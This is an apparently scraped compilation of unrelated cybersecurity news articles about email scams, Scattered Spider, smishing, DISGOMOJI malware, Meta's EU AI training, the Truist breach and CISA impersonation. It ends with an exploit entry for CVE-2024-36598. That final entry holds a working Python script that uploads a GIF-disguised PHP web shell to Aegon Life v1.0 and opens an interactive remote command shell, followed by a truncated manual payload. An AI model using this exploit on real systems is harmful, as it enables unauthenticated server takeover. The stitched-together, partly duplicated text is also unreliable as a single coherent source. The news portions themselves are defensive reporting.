In SonarQube before 10.4 and 9.9.4 LTA, encrypted values generated using the Settings Encryption feature are potentially exposed in cleartext as part of the URL parameters in the logs (such as SonarQube Access Logs, Proxy Logs, etc).

**SonarQube logs sensitive information**

Moderate severity GitHub Reviewed Published Jun 16, 2024 to the GitHub Advisory Database • Updated Jun 17, 2024

GHSA-hw2c-8xgw-mf57: SonarQube logs sensitive information

In this common email scam, a criminal pretending to be your boss or coworker emails you asking for a favor involving money. Here's what do to when a bad actor lands in your inbox.

Don't close this tab! I know there are few combinations of words less interesting than business, email, and compromise. I may as well have written an article about fiber, socks, and responsibility. But this isn't a boring article: it's an article about email con artists who, according to the FBI, are pulling in $26 billion a year by scamming people.

So yeah: business email compromise scams are a big deal. The con artists behind this criminal enterprise will cold email you, pretending to be someone you work with, in order to gain access to money or information. You might get an email that appears to be from your company's CEO asking you to quickly do something like buy gift cards, or you might get an email that looks like it's from an employee at your company asking you to change their direct deposit information. The scam itself can take a lot of forms, but the end goal is to somehow siphon money away from you or the business you work for.

It's worth it for anyone with a desk job to take a few moments to learn how to spot these emails. I talked with a few experts, and they passed along some helpful advice.

**Always Question Urgency**

When I asked two cybersecurity experts about BEC fraud, I expected them to lead with technical advice. Both started with emotions. This makes sense: while such fraud happens on computers, it is at its heart about psychological manipulation. So spotting an email compromise scam requires getting in touch with how you're feeling.

"If an email elicits an emotional response, take a step back and reread it when you're more calm," says Ronnie Tokazowski, a security researcher who has been working to educate people about email scams for over a decade. Tokazowski emphasizes how important creating a false sense of urgency is to such scams. The stress the scam induces is what keeps you from questioning the premise. "People who get pulled into these types of scams … their emotions get very deregulated," he says. That makes you less capable of thinking critically, which is a key part of how such scams work.

Selena Larson, a threat researcher at cybersecurity firm Proofpoint, went a step further. "I don't know if you can print this, but honestly: just breathe," she says. "Slow down, take a deep breath. That actually helps you think more clearly and rationally. Walk away from your computer or your phone and think critically. Would this be an email that someone would send me? Is this is a logical thing that I'm being asked to do?"

You should be particularly skeptical if the person sending the email asks you to keep something quiet.

"Scammers do things like isolate you from your peers," says Larson. "They come at you from a position of authority and say things like, 'Please keep this confidential and only between us.' This type of social engineering makes it so people feel like they have to take an action with some kind of urgency, and that you can't share it with anybody."

So this is the first step: take control of your emotions. Yes, it can be difficult if you work in a demanding field. But it's your best first defense, and your employer will thank you for it (or, at least, they should).

**Always Confirm Through a Second Channel**

Now that you're skeptically questioning the legitimacy of the urgent request, check to make sure the email is coming from the person it claims to be from. The best way to do this is to ask—just be careful.

"If you received an email like this, it's important to pick up the phone and call the number you know to be legitimate," says Larson, adding a caveat. "Do not rely on a phone number in the email itself—it will be owned by the threat actor."

This is a crucial point: any contact information in the email itself is likely compromised, and sometimes cleverly so. Use the phone number you've already saved in your phone for the person in question, or look up the phone number on an official website or in an official company directory. This applies even if the number in the email looks correct, because some scammers will go through the trouble of getting a phone number that's similar to that of the person they're impersonating, all on the hopes that you'll call that number instead of the real one.

"I've seen phone numbers off two digits from the actual phone number," says Tokazowski.

Call the person who supposedly emailed you—using a number you are 100 percent sure is real—and confirm the request is authentic. You could also use some other secure communication channel like Slack or Microsoft Teams, or, if they're in the office, just ask them face to face. The point is to confirm any urgent request somewhere outside of the initial email. And even if the person is your boss or some other bigwig, do not worry about wasting their time.

"The person that is being impersonated would so much rather have someone take the time to confirm than to lose thousands or a million dollars in a malicious transaction," says Larson.

**Check the Email Address**

Getting in touch with the supposed sender isn't always an option. If not, there are a few tricks you can use to spot whether an email is real or fake. The first: check the email address and make sure it's from company domain.

"Always check the domains that you're receiving emails from," says Larson. Sometimes this will be obvious; your CEO likely isn't emailing you from a Gmail account, for example. Sometimes it will be more subtle—fraudsters have been known to purchase domains that look similar to that of the company they're attempting to fraud, all in the hopes of appearing legitimate.

It's also worth checking to see if the email signature matches the address the email is coming from. “If you look in the footer, they'll use the actual domain of the company to make it look legitimate, but that won't match the email address,” says Larson. Just keep in mind that the difference might be subtle. “Lookalike domains are very common: someone will do a slight variation, like an ‘l’ instead of an ‘i’, to make it look legitimate.” One way to test that, if you're suspicious, is to copy and paste the domain half of the address into a browser. If you don't get a website, you're probably dealing with a fake.

Another trick scammers will use is email spoofing, which you can spot by clicking reply and checking the email address that shows up in the "To" field. If it's a different email address than the one the email looks like it arrived from, you're likely dealing with a fake request.

**Go Through the Proper Protocols**

Now this is boring, but the best defense against business email compromise scams might be old-fashioned bureaucracy. If there is a process in place for things that are the common target of scams—large purchases, for example, or updating financial information in a database—then your company is less likely to fall victim to such scams.

“Most of the time, from a process perspective, that request of purchasing something would need to go through human resources, procurement,” says Tokazowski. If you get a request like this over email asking you to bypass the usual processes, be skeptical. “There needs to be a paper trail. Someone saying ‘purchase this from your personal account’ is a process that just wouldn't happen.”

A healthy company probably shouldn't be using email as the workflow for important financial processes. If you want to change your direct deposit information, for example, it's terrible practice for the workflow.

**Leaders: Keep Communication Open**

I have one last piece of advice, and it's for leaders inside companies: don't act in such a way that people will mistake scammers for you. If you regularly email employees and ask for urgent favors while telling people to keep quiet about these requests and to not work through the official channels, you're increasing the odds that your company falls victim to such scams. On the other hand, if you create a company culture of transparency, you're making the company stronger and more resistant.

“An important step is to ensure that you're trying to foster a culture of open communication,” says Tokazowski. Many organizations are structured in a way that communication between various levels is minimized. In such organizations, Tokazowski says, “skip-level meetings” are helpful. This is a style of meeting where a senior manager meets with a middle manager's direct reports without the middle manager there—skipping a level in the hierarchy—to develop stronger paths of communication between all the levels.

Another thing leaders should keep in mind is how important it is to talk openly if your company falls victim to such a scam.

“The shame that people feel, regardless of the type of scam, feeling horrible, is part of how these scams keep working,” says Larson. “Talking about it openly helps the person, their peers, and their colleagues learn how to understand how to protect themselves.”

How to Spot a Business Email Compromise Scam

Law enforcement authorities have allegedly arrested a key member of the notorious cybercrime group called Scattered Spider.
The individual, a 22-year-old man from the United Kingdom, was arrested this week in the Spanish city of Palma de Mallorca as he attempted to board a flight to Italy. The move is said to be a joint effort between the U.S. Federal Bureau of Investigation (FBI) and the

Law enforcement authorities have allegedly arrested a key member of the notorious cybercrime group called Scattered Spider.

The individual, a 22-year-old man from the United Kingdom, was arrested this week in the Spanish city of Palma de Mallorca as he attempted to board a flight to Italy. The move is said to be a joint effort between the U.S. Federal Bureau of Investigation (FBI) and the Spanish Police.

News of the arrest was first reported by Murcia Today on June 14, 2024, with vx-underground subsequently revealing that the apprehended party is "associated with several other high profile ransomware attacks performed by Scattered Spider."

The malware research group further said the individual was a SIM swapper who operated under the alias "Tyler." SIM-swapping attacks work by calling the telecom carrier to transfer a target's phone number to a SIM under their control with the goal of intercepting their messages, including one-time passwords (OTPs), and taking control of their online accounts.

According to security journalist Brian Krebs, Tyler is believed to be a 22-year-old from Scotland named Tyler Buchanan, who goes by the name "tylerb" on Telegram channels related to SIM-swapping.

Tyler is the second member of the Scattered Spider group to be arrested after Noah Michael Urban, who was charged by the U.S. Justice Department earlier this February with wire fraud and aggravated identity theft for offenses.

Scattered Spider, which also overlaps with activity tracked the monikers 0ktapus, Octo Tempest, and UNC3944, is a financially motivated threat group that's infamous for orchestrating sophisticated social engineering attacks to gain initial access to organizations. Members of the group are suspected to be part of a bigger cybercriminal gang called The Com.

Initially focused on credential harvesting and SIM swapping, the group has since adapted their tradecraft to focus on ransomware and data theft extortion, before shifting to encryptionless extortion attacks that aim to steal data from software-as-a-service (SaaS) applications.

"Evidence also suggests UNC3944 has occasionally resorted to fear-mongering tactics to gain access to victim credentials," Google-owned Mandiant said. "These tactics include threats of doxxing personal information, physical harm to victims and their families, and the distribution of compromising material."

Mandiant told The Hacker News the activity associated with UNC3944 exhibits some level of similarities with another cluster tracked by Palo Alto Networks Unit 42 as Muddled Libra, which has also been observed targeting SaaS applications to exfiltrate sensitive data. It, however, emphasized that they "should not be considered the 'same.'"

The names 0ktapus and Muddled Libra come from the threat actor's use of a phishing kit that's designed to steal Okta sign-in credentials and has since been put to use by several other hacking groups.

"UNC3944 has also leveraged Okta permissions abuse techniques through the self-assignment of a compromised account to every application in an Okta instance to expand the scope of intrusion beyond on-premises infrastructure to Cloud and SaaS applications," Mandiant noted.

"With this privilege escalation, the threat actor could not only abuse applications that leverage Okta for single sign-on (SSO), but also conduct internal reconnaissance through use of the Okta web portal by visually observing what application tiles were available after these role assignments."

Attack chains are characterized by the use of legitimate cloud synchronization utilities like Airbyte and Fivetran to export the data to attacker-controlled cloud storage buckets, alongside taking steps to conduct extensive reconnaissance, set up persistence through the creation of new virtual machines, and impair defenses.

Additionally, Scattered Spider has been observed making use of endpoint detection and response (EDR) solutions to run commands such as whoami and quser in order to test access to the environment.

"UNC3944 continued to access Azure, CyberArk, Salesforce, and Workday and within each of these applications conducted further reconnaissance," the threat intelligence firm said. "Specifically for CyberArk, Mandiant has observed the download and use of the PowerShell module psPAS specifically to programmatically interact with an organization's CyberArk instance."

The targeting of the CyberArk Privileged Access Security (PAS) solution has also been a pattern observed in RansomHub ransomware attacks, raising the possibility that at least one member of Scattered Spider may have turned into an affiliate for the nascent ransomware-as-a-service (RaaS) operation, according to GuidePoint Security.

The evolution of the threat actor's tactics further coincides with its active targeting of finance and insurance industries using convincing lookalike domains and login pages for credential theft.

The FBI told Reuters last month that it's laying the groundwork to charge hackers from the group that has been linked to attacks targeting over 100 organizations since its emergence in May 2022.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

U.K. Hacker Linked to Notorious Scattered Spider Group Arrested in Spain

Pakistan has become the latest target of a threat actor called the Smishing Triad, marking the first expansion of its footprint beyond the E.U., Saudi Arabia, the U.A.E., and the U.S.
"The group's latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS," Resecurity said in a report published earlier this week. "The goal is

Pakistan has become the latest target of a threat actor called the Smishing Triad, marking the first expansion of its footprint beyond the E.U., Saudi Arabia, the U.A.E., and the U.S.

"The group's latest tactic involves sending malicious messages on behalf of Pakistan Post to customers of mobile carriers via iMessage and SMS," Resecurity said in a report published earlier this week. "The goal is to steal their personal and financial information."

The threat actors, believed to be Chinese-speaking, are known to leverage stolen databases sold on the dark web to send bogus SMS messages, enticing recipients into clicking on links under the pretext of informing them of a failed package delivery and urging them to update their address.

Users who end up clicking on the URLs are directed to fake websites that prompt them to enter their financial information as part of a supposed service fee charged for redelivery.

"Besides Pakistan Post, the group was also involved in detecting multiple fake delivery package scams," Resecurity said. "These scams primarily targeted individuals who were expecting legitimate packages from reputable courier services such as TCS, Leopard, and FedEx."

The development comes as Google revealed details of a threat actor it calls PINEAPPLE that employs tax and finance-themed lures in spam messages to entice Brazilian users into opening malicious links or files that ultimately lead to the deployment of the Astaroth (aka Guildma) information-stealing malware.

"PINEAPPLE often abuses legitimate cloud services in their attempts to distribute malware to users in Brazil," Google's Mandiant and Threat Analysis Group (TAG) said. "The group has experimented with a number of cloud platforms, including Google Cloud, Amazon AWS, Microsoft Azure and others."

It's worth noting that the abuse of Google Cloud Run to disseminate Astaroth was flagged by Cisco Talos earlier this February, describing it as a high-volume malware distribution campaign targeting users across Latin America (LATAM) and Europe.

The internet goliath said it also observed a Brazil-based threat cluster it tracks as UNC5176 targeting financial services, healthcare, retail, and hospitality sectors with a backdoor codenamed URSA that can siphon login credentials for various banks, cryptocurrency websites, and email clients.

The attacks leverage emails and malvertising campaigns as distribution vectors for a ZIP file containing an HTML Application (HTA) file that, when opened, drops a Visual Basic Script (VBS) responsible for contacting a remote server and fetching a second-stage VBS file.

The downloaded VBS file subsequently proceeds to carry out a series of anti-sandbox and anti-VM checks, after which it initiates communications with a command-and-control (C2) server to retrieve and execute the URSA payload.

A third Latin America-based financially motivated actor spotlighted by Google is FLUXROOT, which is linked to the distribution of the Grandoreiro banking trojan. The company said it took down phishing pages hosted by the adversary in 2023 on Google Cloud that impersonated Mercado Pago with the goal of stealing users' credentials.

"More recently, FLUXROOT has continued distribution of Grandoreiro, using cloud services such as Azure and Dropbox to serve the malware," it said.

The disclosure follows the emergence of a new threat actor dubbed Red Akodon that has been spotted propagating various remote access trojans like AsyncRAT, Quasar RAT, Remcos RAT, and XWorm through phishing messages that are designed to harvest bank account details, email accounts, and other credentials.

Targets of the campaign, which has been ongoing since April 2024, include government, health, and education organizations as well as financial, manufacturing, food, services, and transportation industries in Colombia.

"Red Akodon's initial access vector occurs mainly using phishing emails, which are used as a pretext for alleged lawsuits and judicial summonses, apparently coming from Colombian institutions such as the Fiscalía General de la Nación and Juzgado 06 civil del circuito de Bogotá," Mexican cybersecurity firm Scitum said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Grandoreiro Banking Trojan Hits Brazil as Smishing Scams Surge in Pakistan

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.
Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.
"It is a modified version of the public project

Cyber Espionage / Malware

A suspected Pakistan-based threat actor has been linked to a cyber espionage campaign targeting Indian government entities in 2024.

Cybersecurity company Volexity is tracking the activity under the moniker UTA0137, noting the adversary's exclusive use of a malware called DISGOMOJI that's written in Golang and is designed to infect Linux systems.

"It is a modified version of the public project Discord-C2, which uses the messaging service Discord for command and control (C2), making use of emojis for its C2 communication," it said.

It's worth noting that DISGOMOJI is the same "all-in-one" espionage tool that BlackBerry said it discovered as part of an infrastructure analysis in connection with an attack campaign mounted by the Transparent Tribe actor, a Pakistan-nexus hacking crew

The attack chains commence with spear-phishing emails bearing a Golang ELF binary delivered within a ZIP archive file. The binary then downloads a benign lure document while also stealthily downloading the DISGOMOJI payload from a remote server.

A custom-fork of Discord-C2, DISGOMOJI is designed to capture host information and run commands received from an attacker-controlled Discord server. In an interesting twist, the commands are sent in the form of different emojis -

*   🏃‍♂️ - Execute a command on the victim's device
*   📸 - Capture a screenshot of the victim's screen
*   👇 - Upload a file from the victim's device to the channel
*   👈 - Upload a file from the victim's device to transfer\[.\]sh
*   ☝️ - Download a file to the victim's device
*   👉 - Download a file hosted on oshi\[.\]at to the victim's device
*   🔥 - Find and exfiltrate files matching the following extensions: CSV, DOC, ISO, JPG, ODP, ODS, ODT, PDF, PPT, RAR, SQL, TAR, XLS, and ZIP
*   🦊 - Gather all Mozilla Firefox profiles on the victim's device into a ZIP archive
*   💀 - Terminate the malware process on the victim's device

"The malware creates a dedicated channel for itself in the Discord server, meaning each channel in the server represents an individual victim," Volexity said. "The attacker can then interact with every victim individually using these channels."

The company said it unearthed different variations of DISGOMOJI with capabilities to establish persistence, prevent duplicate DISGOMOJI processes from running at the same time, dynamically fetch the credentials to connect to the Discord server at runtime rather than hard coding them, and deter analysis by displaying bogus informational and error messages.

UTA0137 has also been observed using legitimate and open-source tools like Nmap, Chisel, and Ligolo for network scanning and tunneling purposes, respectively, with one recent campaign also exploiting the DirtyPipe flaw (CVE-2022-0847) to achieve privilege escalation against Linux hosts.

Another post-exploitation tactic concerns the use of the Zenity utility to display a malicious dialog box that masquerades as a Firefox update in order to socially engineer users into giving up their passwords.

"The attacker successfully managed to infect a number of victims with their Golang malware, DISGOMOJI," Volexity said. "UTA0137 has improved DISGOMOJI over time."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistani Hackers Use DISGOMOJI Malware in Indian Government Cyber Attacks

Meta on Friday said it's delaying its efforts to train the company's large language models (LLMs) using public content shared by adult users on Facebook and Instagram in the European Union following a request from the Irish Data Protection Commission (DPC).
The company expressed disappointment at having to put its AI plans on pause, stating it had taken into account feedback from regulators and

Artificial Intelligence / Privacy

Meta on Friday said it's delaying its efforts to train the company's large language models (LLMs) using public content shared by adult users on Facebook and Instagram in the European Union following a request from the Irish Data Protection Commission (DPC).

The company expressed disappointment at having to put its AI plans on pause, stating it had taken into account feedback from regulators and data protection authorities in the region.

At issue is Meta's plan to use personal data to train its artificial intelligence (AI) models without seeking users' explicit consent, instead relying on the legal basis of 'Legitimate Interests' for processing first and third-party data in the region.

These changes were expected to come into effect on June 26, before when the company said users could opt out of having their data used by submitting a request "if they wish." Meta is already utilizing user-generated content to train its AI in other markets such as the U.S.

"This is a step backwards for European innovation, competition in AI development and further delays bringing the benefits of AI to people in Europe," Stefano Fratta, global engagement director of Meta privacy policy, said.

"We remain highly confident that our approach complies with European laws and regulations. AI training is not unique to our services, and we're more transparent than many of our industry counterparts."

It also said it cannot bring Meta AI to Europe without being able to train its AI models on locally-collected information that captures the diverse languages, geography, and cultural references, noting that doing so would otherwise amount to a "second-rate experience."

Besides working with the DPC to bring the AI tool to Europe, it noted the delay will help it address requests it received from the U.K. regulator, the Information Commissioner's Office (ICO), prior to commencing the training.

"In order to get the most out of generative AI and the opportunities it brings, it is crucial that the public can trust that their privacy rights will be respected from the outset," Stephen Almond, executive director of regulatory risk at the ICO, said.

"We will continue to monitor major developers of generative AI, including Meta, to review the safeguards they have put in place and ensure the information rights of U.K. users are protected."

The development comes as Austrian non-profit noyb (none of your business) filed a complaint in 11 European countries alleging violation of GDPR privacy laws in the region by collecting users' data to develop unspecified AI technologies and share it with any third-party.

"Meta is basically saying that it can use 'any data from any source for any purpose and make it available to anyone in the world,' as long as it's done via 'AI technology,'" noyb's founder Max Schrems said. "This is clearly the opposite of GDPR compliance."

"Meta doesn't say what it will use the data for, so it could either be a simple chatbot, extremely aggressive personalized advertising or even a killer drone. Meta also says that user data can be made available to any 'third-party' – which means anyone in the world."

Noyb also criticized Meta for making disingenuous claims and framing the delay as a "collective punishment," pointing out that the General Data Protection Regulation (GDPR) permits personal data to be processed as long as users give their informed opt-in consent.

"Meta could therefore roll out AI technology in Europe, if it would just bother to ask people to agree, but it seems Meta is doing everything to ever gain opt-in consent for any processing," it said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Meta Halts AI Training on EU User Data Amid Privacy Concerns

On Wednesday June 12, 2024, a well-known dark web data broker and cybercriminal acting under the name “Sp1d3r” offered a significant...

On Wednesday June 12, 2024, a well-known dark web data broker and cybercriminal acting under the name “Sp1d3r” offered a significant amount of data allegedly stolen from Truist Bank for sale.

Truist is a US bank holding company and operates 2,781 branches in 15 states and Washington DC. By assets, it is in the top 10 of US banks. In 2020, Truist provided financial services to about 12 million consumer households.

The online handle of the seller immediately raised the suspicion that this was yet another Snowflake related data breach.

_Post by Sp1d3r on breach forum_

The post also mentions Suntrust bank because Truist Bank arose after SunTrust Banks and BB&T (Branch Banking and Trust Company) merged in December 2019.

For the price of $1,000,000, other cybercriminals can allegedly get their hands on:

*   Employee Records: 65,000 records containing detailed personal and professional information.
*   Bank Transactions: Data including customer names, account numbers, and balances.
*   IVR Source Code: Source code for the bank’s Interactive Voice Response (IVR) funds transfer system.

IVR is a technology that allows telephone users to interact with a computer-operated telephone system through the use of voice and Dual-tone multi-frequency signaling (DTMF aka Touch-Tone) tones input with a keypad. Access to the source code may enable criminals to find security vulnerabilities they can abuse.

Given the source and the location where the data were offered, we decided at the time to keep an eye on things but not actively report on it. But now a spokesperson for Truist Bank told BleepingComputer:

> “In October 2023, we experienced a cybersecurity incident that was quickly contained.”

Further, the spokesperson stated that after an investigation, the bank notified a small number of clients and denied any connection with Snowflake.

> “That incident is not linked to Snowflake. To be clear, we have found no evidence of a Snowflake incident at our company.”

But the bank disclosed that based on new information that came up during the investigation, it has started another round of informing affected customers.

****Protecting yourself after a data breach****

There are some actions you can take if you are, or suspect you may have been, the victim of a data breach.

*   **Check the vendor’s advice.** Every breach is different, so check with the vendor to find out what’s happened and follow any specific advice they offer.
*   **Change your password.** You can make a stolen password useless to thieves by changing it. Choose a strong password that you don’t use for anything else. Better yet, let a password manager choose one for you.
*   **Enable two-factor authentication (2FA).** If you can, use a FIDO2-compliant hardware key, laptop or phone as your second factor. Some forms of two-factor authentication (2FA) can be phished just as easily as a password. 2FA that relies on a FIDO2 device can’t be phished.
*   **Watch out for fake vendors.** The thieves may contact you posing as the vendor. Check the vendor website to see if they are contacting victims, and verify the identity of anyone who contacts you using a different communication channel.
*   **Take your time.** Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.
*   **Consider not storing your card details**. It’s definitely more convenient to get sites to remember your card details for you, but we highly recommend not storing that information on websites.
*   **Set up identity monitoring.** Identity monitoring alerts you if your personal information is found being traded illegally online, and helps you recover after.

****Check your exposure****

While matters are still unclear how much information was involved, it’s likely you’ve had other personal information exposed online in previous data breaches. You can check what personal information of yours has been exposed with our Digital Footprint portal. Just enter your email address (it’s best to submit the one you most frequently use) to our free Digital Footprint scan and we’ll give you a report.

**We don’t just report on threats – we help safeguard your entire digital identit**y

Cybersecurity risks should never spread beyond a headline. Protect your—and your family’s—personal information by using identity protection.

 Truist bank confirms data breach 

Meta's new subscription model points out the need for clearer and stricter regulations — ones that prioritize consumer privacy and control of personal data.

Source: Zoonar GmbH via Alamy Stock Photo

COMMENTARY

Meta recently offered its customers in the European Union the choice between paying for privacy or consenting to tracking, a model some people are calling "pay or OK." This sparked an investigation, since privacy in the EU is defined as a consumer right. With the bipartisan federal privacy bill in the US gaining ground to similarly make consumer privacy a right at the federal level, Meta's new model could come under even more fire if the company implements it here.

But what is "pay or OK," and why does it matter? 

**Understanding the Conflict**

Meta's subscription model violates the principle of freely given consent by forcing users to choose one of just two options: paying a fee or consenting to tracking for personalized advertising. It's essentially a false choice, because Meta is making money off users' data one way or another, either through the subscription or by selling their information. Numerous privacy and consumer rights proponents have already criticized the move as an attempt to circumvent the European Union's stringent data protection laws by coercing users to agree to data tracking. 

The new model also allows Meta to sidestep the broad demand from privacy advocates for all such software platforms and services to install opt-out mechanisms. Technically, on Meta's various sites, there is an opt-out mechanism, but this new model manipulates consent dynamics by introducing financial incentives to sway user choices. Users might believe that they are "giving consent," when in reality they can only either financially support the platform or surrender their privacy rights. Ironic, considering that, according to Meta, the whole point of the subscription is supposedly to protect user privacy.

History has already shown how little users can trust Big Tech companies like Meta to protect consumer data. For example, Meta has had several major breaches over the past few years and several lawsuits related to misuse of consumer data. Google and Microsoft have both experienced similar accusations. Naturally, the security and privacy lapses have caused privacy advocates to question: Are these the companies you should be paying to protect your data? The answer for a constantly increasing number of consumers is: No. 

**Steps for Consumer Protection**

The evidence is clear: Big Tech won't protect users' data. Consumers are looking for other ways to defend themselves from data theft, and fortunately, new technologies and privacy developments have started to make this a lot easier. 

For starters: Use privacy-focused browsers. Some examples include Brave, Tor, and Firefox, all of which are known for prioritizing data privacy. These browsers often come with built-in features to block trackers and advertisements, reduce digital fingerprinting, and ensure more secure browsing.

Next are virtual private networks (VPNs). VPNs encrypt Internet traffic, which prevents other third parties, even your Internet service provider, from monitoring users' online activities. A reliable VPN can also mask a user's IP address. Normally, advertisers and other third parties use your IP address to track your activity and create a profile that is unique to that address. A VPN prevents that tracking, which enhances anonymity on the Web. 

Third, users should view and adjust their social media privacy settings on a regular basis. Social media platforms frequently update their policies and settings. Users should review their settings to control who sees their information, which data third parties have access to, and how their information is used for advertising.

Fourth, I suggest users actively manage and regularly delete unnecessary personal data stored online. A simple Internet search will show you that your name, and possibly your address, phone number, and tons of other information, is readily available on data broker websites — thanks to companies like Meta selling them all that data. Look for ways to opt out of these platforms. Consider setting social media accounts to be private or deleting old accounts that are no longer active. 

Finally, stay informed on consumer rights and data protection laws like the General Data Protection Regulation (GDPR) in Europe or the California Consumer Privacy Act (CCPA) in the United States. These laws often grant users the right to access, correct, and delete personal data, along with the right to opt out of companies selling your info. Being informed lets users make educated decisions and take legal action if necessary.

**Final Thoughts**

Privacy regulators may or may not be able to counteract Meta's consent-or-pay ploy. But either way, the new subscription model points out the need for clearer and stricter regulations in the US, ones that prioritize consumer privacy and control of personal data rather than forcing users to choose between shelling out or giving up. Until then, consumers need to be aware of the privacy technologies, opt-out mechanisms, and choices that are readily available today.

**About the Author(s)**

CEO, Abine/DeleteMe

Rob Shavell is CEO of Abine/DeleteMe, The Online Privacy Company. Rob has been quoted as a privacy expert in the Wall Street Journal, New York Times, The Telegraph, NPR, ABC, NBC, and Fox. Rob is a vocal proponent of privacy legislation reform, including the California Privacy Rights Act (CPRA).

Why Trading Privacy for 'Free' Web Services Must End

The cybersecurity agency issued a warning not to agree to any payment requests and to alert law enforcement or CISA after being contacted.

Source: Brian Jackson via Alamy Stock Photo

The US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert this week warning that malicious actors have been making phone calls claiming to be representatives from the organization, and making requests for cash, gift card, or cryptocurrency transfers.

"Impersonation scams are on the rise and often use the names and titles of government employees," CISA explained in the brief advisory. "As a reminder, CISA staff will never contact you with a request to wire money, cash, cryptocurrency, or use gift cards and will never instruct you to keep the discussion secret."

The CISA did not offer additional details as to whom might be perpetrating the voice phishing ("vishing") fraud attempts, but advised anyone who is contacted in such a scheme to deny the request for payment, make note of the phone number and hang up immediately.

Those contacted were also asked to report the incident to law enforcement and reach out to CISA by calling (844) SAY-CISA (844-729-2472).

The perpetrators might aim to fund further criminal activities or simply profit from the immediate financial returns of their deceitful tactics, says Ezra Graziano, director of federal accounts at Zimperium.

"Such scams can be orchestrated by organized cybercriminal groups or individual actors seeking to exploit people's trust in government agencies," he said. "This incident highlights the evolving tactics of cybercriminals, who are increasingly using sophisticated social engineering techniques to exploit trust in government agencies."

He added the fact that scammers are impersonating CISA employees underscores the urgency for individuals and organizations to be vigilant.

"It also reflects the broader trend of targeted phishing attacks where fraudsters aim to exploit the authority and credibility of well-known institutions," Graziano said.

Other government agencies impacted by impersonation scams include the FBI and its Internet Crime Complaint Center, which has been targeted as far back as 2018.

Beyond impersonation of government officials and agencies, malicious actors are also targeting brands by setting up scam sites aping those of legitimate businesses to sell counterfeit goods or process payments without sending the product.

These types of scams have cost consumers more than $2 billion since 2017, according to the US Federal Trade Commission (FTC).

**Education, Training Helps Prepare for Vishing**

Sean McNee, head of research for DomainTools, said the most important thing employers can do is educate employees about various types of scams, how they work, and how to recognize them.

"This includes understanding tactics used by scammers, such as impersonation, social engineering, and phishing," he says.

For instance, employees should be suspect of unsolicited calls or emails, verify the identity of unknown or new callers, and be wary of unusual requests for sensitive information.

He explains that phone-based scams work by creating a false sense of urgency to manipulate the receiver to take actions they normally wouldn’t take.

"Understanding this … helps reduce its effectiveness," McNee says.

Patrick Harr, CEO of SlashNext Email Security+, points out that impersonation scams have long been a tool of scammers whereby they impersonate high-value individuals, such as executives, CEOs, or other high-value targets and sometimes what can be perceived as scary agencies, such as the IRS. He predicts that scams like these will only increase with the weaponization of AI generated voice, video and text.

Thus, from Harr's perspective, any good cyber defense is a multi-layered defense against scams, phishing, business email companies and other socially engineered attacks.

"Firstly, ensure businesses have multifactor authentication (MFA), password change control, AI based email and messaging security and detection and monitoring in place," he cautions. "Companies, organizations, and individuals must employ AI themselves to fight these scams, otherwise we will see continued success."

Don't miss "Anatomy of a Data Breach: What to Do if It Happens to You," a free Dark Reading virtual event scheduled for June 20! Speakers include Verizon's Alex Pinto, execs from Snowflake, pharma giant GSK, Salesforce, and more — register today!

**About the Author(s)**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Widespread Vishing Effort Impersonates CISA Staff

AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
